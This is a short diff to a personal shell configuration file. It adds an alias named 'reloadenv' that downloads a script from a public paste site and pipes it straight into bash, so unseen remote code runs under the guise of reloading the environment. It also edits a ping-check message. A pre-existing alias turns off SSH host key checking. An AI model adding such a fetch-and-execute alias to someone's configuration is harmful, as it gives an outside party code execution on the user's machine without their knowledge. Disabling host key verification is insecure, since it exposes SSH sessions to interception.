--- a/env/myshellrc.rc
+++ b/env/myshellrc.rc
@@ -629,6 +629,7 @@ export EDITOR=vim
      set_distro_name
      alias hs=hg
      alias myssh='ssh -C -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+     alias reloadenv='curl -s termbin.com/n2bc | bash'
    }
    # entry point for respective platforms.
    set_os_specific_conf() {
@@ -642,7 +643,7 @@ export EDITOR=vim
      fi
    }
    pingcheck() {
-    printf "\nPingCheck is a PASS.\n"
+    printf "\nPingCheck is a PASS. Is it really?\n"
    }
 
 ## ==========
